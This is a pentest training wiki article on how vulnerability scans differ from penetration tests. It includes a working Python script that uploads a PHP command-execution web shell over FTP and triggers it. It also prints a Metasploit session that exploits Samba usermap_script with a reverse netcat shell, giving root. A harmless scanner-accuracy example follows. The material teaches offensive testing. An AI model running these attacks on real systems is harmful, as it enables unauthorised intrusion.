It goes without saying that many processes in a penetration test can and should be automated. We can write scripts, for example, that find web applications within a network. A more complex form of such automation is the vulnerability scanner, which automatically searches an IT system for vulnerabilities. Identifying vulnerabilities is not only the main task of a vulnerability scanner, but also our job as penetration testers. The question, then, is whether a vulnerability scan is comparable to a penetration test and, if not, how the two differ.

Vulnerability scans must be configured and started by a user; after that, the scanner searches for weak points on its own. A penetration test, on the other hand, includes manual test phases, which naturally take much longer. Vulnerability scanners can also only identify known vulnerabilities, because every check must already be present in the scanner's plugin or signature database. A pentester, in addition, can search for new, still unknown vulnerabilities or creatively combine several conditions to compromise an IT system. For example, a web server might serve files from a directory that is also writable through an FTP server. An attacker then only needs FTP access: upload a PHP file, request it through the web server, and the command inside it is executed.
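The chain in the last sentence, as an added Python example that is not part of this article: it uploads a small PHP probe over FTP, requests it through the web server, and checks whether PHP actually executed rather than merely serving the file back (a web server that serves the directory but does not run PHP there looks the same to a plain HTTP 200 check). The FTP host, credentials and web URL are placeholders passed on the command line.

```python
"""FTP-write-to-webroot chain: upload a PHP file over FTP, run it over HTTP.

Added example, not part of the binsec wiki article. It assumes a host whose
FTP account can write to a directory that a PHP-enabled web server serves;
host names, credentials and paths are placeholders given on the command line.
"""
import ftplib
import io
import secrets
import sys
import urllib.parse
import urllib.request


def build_probe(marker):
    """PHP probe that prints a marker before and after the output of the
    requested command. The marker lets us tell 'PHP ran' apart from 'the
    server handed back the source file'."""
    return (
        "<?php echo '" + marker + "'; "
        "if (isset($_GET['c'])) { system($_GET['c']); } "
        "echo '" + marker + "'; ?>"
    )


def executed(body, marker):
    """True only if the marker appears exactly twice and no PHP tag is
    visible: a download of the script itself also contains both markers."""
    return body.count(marker) == 2 and "<?php" not in body


def extract_output(body, marker):
    """Command output between the two markers, or None if PHP did not run."""
    if not executed(body, marker):
        return None
    start = body.index(marker) + len(marker)
    end = body.index(marker, start)
    return body[start:end].strip()


def upload(ftp_host, user, password, remote_name, content):
    with ftplib.FTP(ftp_host, timeout=10) as ftp:
        ftp.login(user, password)
        ftp.storbinary("STOR " + remote_name, io.BytesIO(content.encode()))


def delete(ftp_host, user, password, remote_name):
    with ftplib.FTP(ftp_host, timeout=10) as ftp:
        ftp.login(user, password)
        ftp.delete(remote_name)


def trigger(url, command):
    req = url + "?" + urllib.parse.urlencode({"c": command})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


def main(ftp_host, user, password, web_url, command="id"):
    marker = secrets.token_hex(8)          # random, so the check cannot be faked by static content
    name = "probe_" + marker + ".php"
    upload(ftp_host, user, password, name, build_probe(marker))
    try:
        body = trigger(web_url.rstrip("/") + "/" + name, command)
    finally:
        delete(ftp_host, user, password, name)   # leave nothing behind on the target
    out = extract_output(body, marker)
    if out is None:
        print("PHP did not execute; start of response:", body[:200])
    else:
        print("command output:", out)


if __name__ == "__main__":
    if len(sys.argv) < 5:
        sys.exit("usage: chain.py FTP_HOST USER PASSWORD WEB_URL [COMMAND]")
    main(*sys.argv[1:6])
```

The probe is deleted again in a finally block so that a failed HTTP request does not leave a command-execution file on the client's server; that is the same discipline the text demands for tools whose impact on the environment must be known.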

Another difference between vulnerability scanners and pentesters concerns the exploitation of vulnerabilities. At the request of the client, pentesters exploit vulnerabilities to find out how deep an attacker could have penetrated into the target system. A vulnerability scanner does not exploit anything; it reports whatever its checks match, and that includes false positives. This means that every automatically identified vulnerability must be verified manually.

Thus, a penetration test can include a vulnerability scan, but does much more than that. It should be noted here that tools, and vulnerability scanners in particular, should only be used if their impact on the environment under investigation can be assessed. Otherwise we are at a loss when the client contacts us about sudden malfunctions in the production system. We should also be aware that we ourselves can be hacked when executing third-party scripts or tools. It is therefore essential to look at the source code, where possible, and to take precautions such as using isolated systems as a working platform.

There are currently many vulnerability scanners on the market. Two of the best known are Nessus and OpenVAS. Nessus, from Tenable Network Security, is a commercial scanner that runs on Windows, Linux, Unix and Mac OS X. OpenVAS only exists for Linux, but it is available for free as open-source software.

In addition to the vulnerability scanners on the market, Rapid7 maintains its own penetration testing framework: Metasploit. Metasploit essentially provides a collection of exploits that can be adapted to the needs of an attacker or tester through various options. To learn how to use it, Offensive Security created a publicly available training course: Metasploit Unleashed (https://www.offensive-security.com/metasploit-unleashed/). The following listing shows how Metasploit is used to exploit a vulnerability in the file server of Dubius Payment Ltd. automatically:

~# msfconsole 
msf > use exploit/multi/samba/usermap_script 
msf exploit(usermap_script) > set RHOST 10.247.97.48 
RHOST => 10.247.97.48 
msf exploit(usermap_script) > set RPORT 445 
RPORT => 445 
msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse_netcat 
PAYLOAD => cmd/unix/reverse_netcat 
msf exploit(usermap_script) > set LHOST 10.20.1.14 
LHOST => 10.20.1.14 
msf exploit(usermap_script) > set LPORT 4444 
LPORT => 4444 
msf exploit(usermap_script) > exploit 
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Command shell session 1 opened (10.20.1.14:4444 -> 10.247.97.48:54765) 
    at Wed Nov 28 13:39.22 +0100 2017 


ip addr show 
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 
    inet 127.0.0.1/8 scope host lo 
       valid_lft forever preferred_lft forever 
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever 
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 
    link/ether d6:15:2f:c4:9a:96 brd ff:ff:ff:ff:ff:ff 
    inet 10.247.97.48/24 brd 10.247.97.255 scope global eth0 
       valid_lft forever preferred_lft forever 
    inet6 fe80::d415:2fff:fec4:9a96/64 scope link 
       valid_lft forever preferred_lft forever 
hostname 
ftp01 
id 
uid=0(root) gid=0(root) groups=0(root)

Remark: The above scenario does not work in the practice lab.

If we want to compare the validity of vulnerability scans with that of penetration tests, we need a clear understanding of the false negative rate (FNR): how many existing vulnerabilities does a vulnerability scanner fail to identify? If you like, you can find out for yourself by scanning the DMZ network of Dubius Payment with Nessus (7-day trial) or OpenVAS, for example. In your opinion, how many vulnerabilities will the scan list: 0, 10, 25 or even more than 50?
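As an added example that is not part of this article, the following Python script models both points made above: how a scanner decides from a service banner whether a known vulnerability is present, and how the false negative rate is computed once a tester has manually verified the findings. The banners, the hosts other than 10.247.97.48 and the "verified" ground truth are constructed; the only real data is the affected version range of CVE-2007-2447, the Samba "username map script" bug that the usermap_script module in the listing above exploits.

```python
"""Toy signature-based scanner plus false negative rate (FNR) calculation.

Added example, not part of the binsec wiki article. Everything below is
constructed for illustration except the version range of CVE-2007-2447
(Samba 'username map script', Samba 3.0.0 up to 3.0.25rc3).
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Signature:
    """One 'known vulnerability' entry, as a scanner plugin database holds it."""
    cve: str
    product: str
    min_version: tuple  # inclusive
    max_version: tuple  # inclusive


# The toy parser below cannot express the 'rc3' in 3.0.25rc3, so the range is
# written as 3.0.0 .. 3.0.24. That limitation is what produces a false negative.
SIGNATURES = [Signature("CVE-2007-2447", "Samba", (3, 0, 0), (3, 0, 24))]


def parse_version(banner):
    """Pull X.Y.Z out of a banner. Pre-release tags such as 'rc3' are dropped,
    so 'Samba 3.0.25rc3' becomes (3, 0, 25): a deliberate scanner weakness."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", banner)
    return tuple(int(x) for x in m.groups()) if m else None


def scan(banners, signatures=SIGNATURES):
    """Signature matching as a scanner does it: product name in the banner and
    parsed version inside the known-vulnerable range. Nothing is exploited.
    Returns the set of (host, port, cve) the scanner would report."""
    findings = set()
    for host, port, banner in banners:
        version = parse_version(banner)
        for sig in signatures:
            if (sig.product.lower() in banner.lower() and version is not None
                    and sig.min_version <= version <= sig.max_version):
                findings.add((host, port, sig.cve))
    return findings


def compare(reported, verified):
    """Confusion sets between what the scanner reported and what manual
    verification (an exploit attempt) actually confirmed."""
    return {
        "true_positive": reported & verified,
        "false_positive": reported - verified,
        "false_negative": verified - reported,
    }


def false_negative_rate(result):
    """FNR = FN / (TP + FN): share of real vulnerabilities the scanner missed."""
    fn = len(result["false_negative"])
    tp = len(result["true_positive"])
    return fn / (tp + fn) if tp + fn else 0.0


# Constructed banners, not real scan output. 10.247.97.48 is the file server
# from the listing above; the other hosts are invented.
BANNERS = [
    ("10.247.97.48", 445, "Samba 3.0.20-Debian"),   # exploitable, as the listing shows
    ("10.247.97.49", 445, "Samba 3.0.24"),          # assumed: vendor backported the fix
    ("10.247.97.50", 445, "Samba 3.0.25rc3"),       # still vulnerable; parser misreads it
    ("10.247.97.51", 445, "Samba 3.6.3"),           # outside the range
    ("10.247.97.52", 21, "220 (vsFTPd 3.0.3)"),     # no Samba signature applies
]

# Constructed ground truth after manual verification: what the tester could
# actually exploit. The last entry is the FTP-to-PHP chain from the text, for
# which no scanner signature exists at all.
VERIFIED = {
    ("10.247.97.48", 445, "CVE-2007-2447"),
    ("10.247.97.50", 445, "CVE-2007-2447"),
    ("10.247.97.52", 21, "ftp-write-to-webroot"),
}


def run():
    reported = scan(BANNERS)
    result = compare(reported, VERIFIED)
    return reported, result, false_negative_rate(result)


if __name__ == "__main__":
    reported, result, fnr = run()
    for name, items in result.items():
        print(f"{name}: {sorted(items)}")
    print(f"FNR = {fnr:.2f}")
```

With these inputs the scanner reports two hosts: one true positive (the file server) and one false positive (the backported build that the tester cannot exploit), while it misses the misparsed release candidate and the FTP/PHP chain, giving an FNR of 2/3. Both error types are exactly what the text says a pentester has to handle: verify every reported finding manually, and expect real vulnerabilities that no signature covers.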

Last modified: Dec. 15, 2022

Penetration Testing Course

About Pentest Training

Discover the world of penetration testing. Learn how to infiltrate networks and successfully penetrate systems and applications. Acquire the necessary hacking skills and use them when conducting professional penetration tests. Become a real penetration tester. Here you will find the free documents for the Pentest Training of binsec academy GmbH. The binsec academy GmbH offers the corresponding security training lab environments and certifications. However, the knowledge and wiki articles on hacking and penetration testing are universal.

About binsec academy GmbH

binsec academy GmbH is the European provider of online security training with virtual laboratory environments. The core component of all security training is the focus on practice, practice and more practice. In the wiki here you will find the public and freely available course materials. You can put the theory into practice at binsec-academy.com.